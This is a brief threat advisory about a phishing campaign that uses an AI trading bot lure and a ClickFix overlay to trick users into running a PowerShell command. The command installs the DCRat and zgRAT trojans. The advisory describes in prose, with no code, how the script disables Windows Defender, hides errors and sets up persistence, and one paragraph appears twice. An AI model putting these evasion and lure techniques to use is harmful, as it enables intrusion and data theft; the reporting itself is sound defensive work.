A campaign was observed that uses an AI Trading Bot lure. The message makes several claims about the use of machine learning and real-time market analysis to gain a trading advantage. Instead, this phishing attempt installs two remote access trojans (RATs), Dark Crystal RAT (DCRat) and zgRAT. RATs provide threat actors with full remote access to a victim’s computer, enabling them to capture sensitive information, including passwords, screenshots, clipboard content, cookies, and other personal data.

The message includes URLs that direct users to a landing page promising a credit-cardless experience. If a user clicks the “Get started for free” button, an overlay using the ClickFix technique appears. If the user copies and pastes as instructed, a PowerShell command executes. The script disables real-time monitoring services such as Windows Defender, silences error messages to hide malicious activity, establishes persistence by creating a shortcut in a user’s Startup folder, and downloads and installs DCRat and zgRAT.

The message includes URLs that direct users to a landing page promising a credit-cardless experience. If a user clicks the “Get started for free” button, an overlay using the ClickFix technique appears. If the user copies and pastes as instructed, a PowerShell command executes. The script disables real-time monitoring services such as Windows Defender, silences error messages to hide malicious activity, establishes persistence by creating a shortcut in a user’s Startup folder, and downloads and installs DCRat and zgRAT.